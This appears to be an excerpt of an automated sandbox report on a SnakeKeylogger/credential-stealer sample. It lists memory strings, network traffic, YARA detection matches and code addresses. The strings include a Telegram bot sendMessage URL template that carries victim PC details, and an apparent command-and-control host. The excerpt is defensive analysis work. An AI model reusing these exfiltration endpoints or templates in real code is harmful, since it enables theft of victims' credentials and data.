Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kashmirestore.com
Source: Ti5nuRV7y4.exe, 00000000.00000002.1309507329.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aoTiGLRa.exe, 00000011.00000002.1374494417.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehH
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20a
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003373000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003390000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003231000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003390000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.000000000325B000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228$
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003509000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49815 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_0153DE34	0_2_0153DE34
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_07480460	0_2_07480460
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_0748BAC8	0_2_0748BAC8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_074880E8	0_2_074880E8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_07480452	0_2_07480452
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_0748E418	0_2_0748E418
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_07487488	0_2_07487488
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_0748B3C9	0_2_0748B3C9
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_0748B3D8	0_2_0748B3D8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076FDD85	0_2_076FDD85
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F6628	0_2_076F6628
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F8570	0_2_076F8570
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F8138	0_2_076F8138
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F7EC7	0_2_076F7EC7
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F6E89	0_2_076F6E89
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F6E98	0_2_076F6E98
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076F6A60	0_2_076F6A60
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01193188	14_2_01193188
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01197C19	14_2_01197C19
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01194E1C	14_2_01194E1C
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01193070	14_2_01193070
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0119C7D0	14_2_0119C7D0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01192D54	14_2_01192D54
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174C147	14_2_0174C147
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01745362	14_2_01745362
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174D278	14_2_0174D278
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174C468	14_2_0174C468
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174C738	14_2_0174C738
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_017469A0	14_2_017469A0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174E988	14_2_0174E988
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174CA08	14_2_0174CA08
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01749DE0	14_2_01749DE0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174CCD8	14_2_0174CCD8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01746FC8	14_2_01746FC8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174CFAB	14_2_0174CFAB
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01743E09	14_2_01743E09
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174E97B	14_2_0174E97B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174F961	14_2_0174F961
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0174394B	14_2_0174394B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC1E80	14_2_06CC1E80
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC17A0	14_2_06CC17A0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCFC68	14_2_06CCFC68
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC9C70	14_2_06CC9C70
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC9548	14_2_06CC9548
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC0B30	14_2_06CC0B30
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC5028	14_2_06CC5028
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC2968	14_2_06CC2968
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCE6AF	14_2_06CCE6AF
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCE6B0	14_2_06CCE6B0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC1E70	14_2_06CC1E70
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCDE00	14_2_06CCDE00
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC178F	14_2_06CC178F
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCEF5B	14_2_06CCEF5B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCEF60	14_2_06CCEF60
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCCCA0	14_2_06CCCCA0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC9C6B	14_2_06CC9C6B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCDDFF	14_2_06CCDDFF
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCD54B	14_2_06CCD54B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCD550	14_2_06CCD550
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC953B	14_2_06CC953B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCEAFF	14_2_06CCEAFF
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCE258	14_2_06CCE258
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCE253	14_2_06CCE253
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC8B91	14_2_06CC8B91
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC8BA0	14_2_06CC8BA0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCF3B8	14_2_06CCF3B8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCEB08	14_2_06CCEB08
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC0B20	14_2_06CC0B20
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCD0F8	14_2_06CCD0F8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC0040	14_2_06CC0040
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCF80B	14_2_06CCF80B
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC0007	14_2_06CC0007
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC5018	14_2_06CC5018
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCF810	14_2_06CCF810
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCD9A8	14_2_06CCD9A8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCD9A3	14_2_06CCD9A3
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_02D6DE34	17_2_02D6DE34
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_059570A0	17_2_059570A0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_059580E8	17_2_059580E8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_0595BAC8	17_2_0595BAC8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_05950451	17_2_05950451
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_05950460	17_2_05950460
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_0595B3D8	17_2_0595B3D8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_0595B3C9	17_2_0595B3C9
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 17_2_0595BABA	17_2_0595BABA
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01482968	20_2_01482968
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148FC68	20_2_0148FC68
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01489C18	20_2_01489C18
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01485028	20_2_01485028
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01489328	20_2_01489328
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01480B30	20_2_01480B30
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_014817A0	20_2_014817A0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148E258	20_2_0148E258
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01481E80	20_2_01481E80
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01489548	20_2_01489548
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148D540	20_2_0148D540
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148295A	20_2_0148295A
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148D550	20_2_0148D550
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148DDF1	20_2_0148DDF1
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148D999	20_2_0148D999
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148D9A8	20_2_0148D9A8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01480040	20_2_01480040
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148F802	20_2_0148F802
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01480006	20_2_01480006
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01485018	20_2_01485018
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148F810	20_2_0148F810
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148D0E9	20_2_0148D0E9
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148D0F8	20_2_0148D0F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148CC8F	20_2_0148CC8F
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148CCA0	20_2_0148CCA0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148EF51	20_2_0148EF51
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148EF60	20_2_0148EF60
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148EB08	20_2_0148EB08
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01480B20	20_2_01480B20
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148178F	20_2_0148178F
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01488B91	20_2_01488B91
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148F3A8	20_2_0148F3A8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01488BA0	20_2_01488BA0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148F3B8	20_2_0148F3B8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148E257	20_2_0148E257
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01481E70	20_2_01481E70
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148DE00	20_2_0148DE00
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148EAF8	20_2_0148EAF8
